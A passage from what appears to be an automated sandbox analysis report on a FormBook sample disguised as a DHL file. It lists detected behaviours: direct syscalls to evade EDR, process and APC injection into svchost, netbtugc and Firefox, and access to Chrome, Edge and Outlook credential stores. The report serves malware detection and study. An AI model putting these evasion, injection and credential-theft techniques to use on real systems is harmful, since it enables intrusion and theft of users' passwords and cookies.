            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]2_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]2_2_03ABE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]2_2_03AC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]2_2_03A649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03AFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]2_2_03AB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]2_2_03AC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]2_2_03ABC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]2_2_03ABC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]2_2_03AB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h]2_2_03B04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]2_2_03A30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]2_2_03ABC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03AFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03A5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]2_2_03B008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00C580A9
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C2A155
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C2A124 SetUnhandledExceptionFilter,0_2_00C2A124

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtQueryValueKey: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtOpenKeyEx: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 7840Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\DHL 30312052024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E49008Jump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C587B1 LogonUserW,0_2_00C587B1
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C03B3A
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C048D7
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C64C53 mouse_event,0_2_00C64C53
            Source: C:\Users\user\Desktop\DHL 30312052024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 30312052024.exe"Jump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C57CAF
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C5874B
            Source: DHL 30312052024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: DHL 30312052024.exe, FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C2862B cpuid 0_2_00C2862B
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C34E87
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C41E06 GetUserNameW,0_2_00C41E06
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00C33F3A
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C049A0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: DHL 30312052024.exeBinary or memory string: WIN_81
            Source: DHL 30312052024.exeBinary or memory string: WIN_XP
            Source: DHL 30312052024.exeBinary or memory string: WIN_XPe
            Source: DHL 30312052024.exeBinary or memory string: WIN_VISTA
            Source: DHL 30312052024.exeBinary or memory string: WIN_7
            Source: DHL 30312052024.exeBinary or memory string: WIN_8
            Source: DHL 30312052024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

